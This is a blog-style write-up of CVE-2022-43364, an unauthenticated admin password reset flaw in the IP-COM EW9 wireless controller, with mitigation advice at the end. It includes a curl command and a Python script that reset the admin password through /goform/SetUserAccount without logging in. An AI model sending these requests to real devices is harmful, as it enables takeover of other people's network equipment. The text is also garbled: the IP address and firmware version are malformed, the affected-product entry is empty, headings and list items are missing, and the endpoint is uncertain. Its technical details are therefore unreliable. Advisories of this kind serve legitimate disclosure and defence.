CVE-2022-43364 - How a Simple Flaw in IP-COM EW9 Let Anyone Reset the Admin Password

---

Introduction

In 2022, a critical vulnerability was found in the wireless controller IP-COM EW9, specifically in firmware version V15.11..14(9732). Tracked as CVE-2022-43364, this issue exposes a dangerous flaw: anyone, even if they aren't logged in, can reset the administrator password using the password reset page.

This long-read post will break down the vulnerability, show you sample code for triggering it, explain why it happens, and point you to original resources for detailed study. Whether you're a security enthusiast or just getting started, read on to see how a small mistake can have a big impact.

What is CVE-2022-43364?

CVE-2022-43364 is an “access control” vulnerability in the password reset functionality of IP-COM's EW9 wireless controller. The function that lets administrators reset their password is not properly protected, meaning any attacker—without even logging in—can use it to change the password to whatever they like.

Affected Product:

Why is it So Serious?

This means an attacker only needs access to the device's web interface. Once there, they can reset the admin password. The legitimate admin may get locked out, or worse, the attacker can change any setting, compromise the network, or use the device to attack other systems.

In simple terms: Anyone who can visit the web page can take over the router.

Did you prove your identity via email or a security question?

But CVE-2022-43364 fails to do that. The reset page (usually /goform/SetUserAccount or similar) doesn’t validate the requestor’s identity at all.

Sample Exploit Code

Here’s a very basic example using the curl command on Linux to change the password without any authentication:

curl -X POST http://192.168..1/goform/SetUserAccount \
  -d "user=admin&oldpwd=anyvalue&newpwd=MyNewPassword123"

The router updates the admin password to MyNewPassword123 right away!

Note: This command may vary based on the HTTP form parameters used by your specific firmware version.

Here's how you could do the same in Python

import requests

url = 'http://192.168..1/goform/SetUserAccount'
data = {
    'user': 'admin',
    'oldpwd': 'irrelevant',
    'newpwd': 'MyNewPasswrd!'
}

r = requests.post(url, data=data)
print('Status:', r.status_code)
print('Response:', r.text)

Why Did This Happen?

The password reset endpoint doesn’t check any session, token, or identity before allowing a password change. This is a classic broken access control flaw:

No CSRF protection: If the interface is exposed, even a CSRF attack might work.

A secure design would require the user to be logged in, or to verify their identity another way before processing a password reset.

1. Update Your Firmware

- Check IP-COM’s support page for the latest firmware updates.

Don’t expose the admin interface to the public internet.

- Restrict access to management interfaces to trusted devices/networks.

3. Temporary Workarounds

- Block access to /goform/SetUserAccount using firewall or proxy rules.

References

- NVD entry for CVE-2022-43364
- Security report at Exploit-DB
- IP-COM official website

Conclusion

*CVE-2022-43364* is a textbook case of how access control mistakes put entire networks at risk. If you use IP-COM EW9 devices, make sure you patch them immediately and never expose management interfaces to untrusted networks.

For tech admins, always be wary: never trust user requests without checking who made them. For users, always update your devices and restrict web admin access whenever possible.

Timeline

Published on: 10/27/2022 18:15:00 UTC
Last modified on: 10/31/2022 18:33:00 UTC